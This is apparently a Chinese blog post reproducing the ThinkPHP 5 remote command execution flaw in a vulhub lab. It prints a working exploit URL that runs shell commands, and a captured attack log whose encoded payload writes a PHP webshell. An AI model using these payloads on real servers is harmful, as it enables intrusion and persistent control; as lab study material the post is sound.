• 【漏洞复现系列】ThinkPHP 5 远程命令执行


    使用vulhub搭建环境:
    https://github.com/vulhub/vulhub/tree/master/thinkphp/5-rce

    启动docker容器:

    docker-compose up -d

    访问8080端口:

    http://your-ip:8080

    执行whoami命令:
    http://xx.xx.xx.xx:8080/?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=whoami






    {
    "dst_host": "10.53.2.2",
    "dst_port": 80,
    "local_time": "2020-10-19 11:22:35.283207",
    "logdata": {
    "Headers": "{'accept-language': 'en-US, en; q=0.8, zh-Hans-CN; q=0.5, zh-Hans; q=0.3', 'accept-encoding': 'gzip, deflate', 'connection': 'Close', 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'user-agent': 'Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)', 'host': '117.50.11.67:20547', 'referer': 'http://117.50.11.67:20547//index.php?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=php://filter/write=convert.base64-decode|string.rot13'}",
    "Method": "GET",
    "PATH": "//index.php",
    "http_args": {
    "function": [
    "call_user_func_array"
    ],
    "s": [
    "index/think\app/invokefunction"
    ],
    "vars[0]": [
    "file_put_contents"
    ],
    "vars[1][]": [
    "php://filter/write=convert.base64-decode|string.rot13/resource=sxf.php",
    "PD9jdWMgcmVlYmVfZXJjYmVndmF0KDApOyRuPSckX2NiZmdbImsiXSc7JG89ZmdlZ2JoY2NyZSgiJG4iKTtyaW55KCJyaW55KCRvKTsiKT8+dXJlcg=="
    ]
    }
    }
    金麟岂是池中物,一遇风云便化龙!
  • 相关阅读:
    Spring的AOP深入理解
    枚举和注解学习笔记
    单例模式
    工厂设计模式
    网络编程
    多线程笔记
    IOI2021集训队作业
    计蒜客 mark
    51nod mark
    关于此博客
  • 原文地址:https://www.cnblogs.com/ABKing/p/13848585.html
Copyright © 2020-2023  润新知